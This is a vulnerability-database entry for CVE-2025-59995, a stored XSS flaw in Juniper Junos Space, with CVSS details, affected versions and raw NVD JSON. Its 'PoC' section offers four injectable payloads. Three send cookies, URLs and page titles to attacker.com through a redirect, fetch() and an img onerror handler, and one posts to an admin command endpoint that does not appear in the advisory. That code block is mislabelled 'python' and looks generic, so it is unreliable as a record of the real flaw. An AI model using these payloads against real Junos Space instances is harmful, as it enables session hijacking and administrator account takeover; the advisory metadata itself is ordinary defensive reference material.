Security Vulnerability Report
中文
CVE-2025-59995 CVSS 6.1 MEDIUM

CVE-2025-59995

Published: 2025-10-09 17:16:02
Last Modified: 2026-01-23 20:00:46
Source: [email protected]

Description

An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Juniper Networks Junos Space allows an attacker to inject script tags in the Quick Template page that, when visited by another user, enables the attacker to execute commands with the target's permissions, including an administrator. This issue affects all versions of Junos Space before 24.1R4.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:juniper:junos_space:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:juniper:junos_space:24.1:r1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:juniper:junos_space:24.1:r2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:juniper:junos_space:24.1:r3:*:*:*:*:*:* - VULNERABLE
Juniper Networks Junos Space < 24.1R4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-59995 PoC: Stored XSS in Juniper Junos Space Quick Template --> <!-- Inject the following payload into the Quick Template input field --> <!-- Payload 1: Basic cookie stealing --> <script>document.location='http://attacker.com/steal?c='+document.cookie</script> <!-- Payload 2: Session hijack with exfiltration --> <script> fetch('http://attacker.com/log', { method: 'POST', body: JSON.stringify({ cookies: document.cookie, url: window.location.href, user: document.title }) }); </script> <!-- Payload 3: Admin action execution via CSRF-like request --> <script> var xhr = new XMLHttpRequest(); xhr.open('POST', '/api/admin/executeCommand', true); xhr.setRequestHeader('Content-Type', 'application/json'); xhr.send(JSON.stringify({command: 'show configuration'})); </script> <!-- Payload 4: Using img tag for stealthy exfiltration --> <img src=x onerror="fetch('http://attacker.com/x?'+document.cookie)">

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59995", "sourceIdentifier": "[email protected]", "published": "2025-10-09T17:16:02.110", "lastModified": "2026-01-23T20:00:46.490", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Juniper Networks Junos Space allows an attacker to inject script tags in the Quick Template page that, when visited by another user, enables the attacker to execute commands with the target's permissions, including an administrator.\nThis issue affects all versions of Junos Space before 24.1R4."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:juniper:junos_space:*:*:*:*:*:*:*:*", "versionEndExcluding": "24.1", "matchCriteriaId": "2EC090A9-634B-4AA2-916F-7548AF71FF76"}, {"vulnerable": true, "criteria": "cpe:2.3:a:juniper:junos_space:24.1:r1:*:*:*:*:*:*", "matchCriteriaId": "0566970C-0E9B-4566-9920-C7C436A4243D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:juniper:junos_space:24.1:r2:*:*:*:*:*:*", "matchCriteriaId": "A2AA399D-5A7D-45B8-B774-D69054DFA4D3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:juniper:junos_space:24.1:r3:*:*:*:*:*:*", "matchCriteriaId": "57CC4E1A-23AA-4B4A-8690-5EEDCBEC4BBE"}]}]}], "references": [{"url": "https://supportportal.juniper.net/JSA103140", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.